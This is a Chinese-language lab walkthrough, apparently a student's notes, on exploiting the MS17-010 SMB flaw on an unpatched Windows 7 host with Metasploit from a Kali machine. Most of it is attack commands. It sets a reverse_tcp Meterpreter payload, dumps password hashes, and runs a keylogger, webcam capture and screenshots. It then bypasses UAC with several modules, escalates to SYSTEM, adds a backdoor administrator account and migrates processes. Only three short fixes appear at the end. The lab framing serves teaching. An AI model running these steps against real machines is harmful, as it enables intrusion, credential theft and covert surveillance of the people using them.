实验需求
一台kali攻击机ip:10.165.240.18
一台Windows7靶机(需要桥接,无补丁,关闭防火墙)ip:10.165.240.14
实验步骤
测试连通性
发现连通性完好
主机扫描
发现靶机开放445端口
进入msf平台
搜索漏洞模块
auxiliary是扫描模块
exploit是攻击模块
使用扫描模块
也可以
use auxiliary/scanner/smb/smb_ms17_010
设置IP地址
验证
发现存在17-010漏洞
使用攻击模块
设置payload
设置IP地址
验证
run和exploit都是可以的
后渗透****
获取密码hash值
可通过工具或在线网址进行解密
如果需要远程连接
需要再开一个终端
远程桌面登录靶机
rdesktop -u 用户名 -p 密码 靶机IP:3389
rdesktop IP地址
getuid #获取靶机uid
shell #进入靶机shell
screenshot #靶机截屏
webcam_snap #用靶机摄像头拍照
webcam_stream #用靶机摄像头录像
keyscan_start #开启键盘记录
keyscan_dump #捕获键盘记录
keyscan_stop #停止键盘记录
查看系统信息 sysinfo
查看是否为虚拟机 run post/windows/gather/checkvm
列举当前登录的用户 run post/windows/gather/enum_logged_on_users
Meterpreter自动提权命令
getsystem
提权命令执行失败,绕过uac
use exploit/windows/local/bypassuac
set payload windows/meterpreter/reverse_tcp
ser LHOST=IP地址
set session 1
exploit
绕过UAC提权
先获取session 输入 bg
输入提权模块 use exploit/windows/local/ask
再输入 options 查看配置参数
把刚才的session输入进去:set session 1
,再run 一下
shell
进入靶机shell(cmd)
第一步
chcp 65001 #解决乱码
net user 用户名 密码 /add
提升用户权限为管理员
net localgroup Administrator 用户名 /add
使用msf模块提权
要想提权必须是已经拿到meterpreter 然后将当前meterpreter 后台 meterprerer中输入 background
1、 查看可用模块 MSF终端中输入 search bypassuac 查看提权模块
2、 选择一个适合当前系统的提权模块 我这边使用的是win10系统
那我们使用:use exploit/windows/local/bypassuac_windows_store_reg 尝试提权
这个模块不行就换一个 use exploit/windows/local/bypassuac_sluihijack
或者 use exploit/windows/local/bypassuac_dotnet_profiler
3 配置模块使用参数 终端内输入: show options
4 可以看到需要配置 session 终端内输入:set session {需要提权的session id}
5 执行提权 终端内输入:run
6 获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限
7 获取权限完成后 输入getuid 即可看到 已经获取到SYSTEM 最高权限了
进程迁移:
1:查看当前会话的进程id
getpid
2:查看目标运行的进程
ps
3:绑定进程
migrate pid
修复方法
1:关闭445端口
2:开启防火墙
3:打上补丁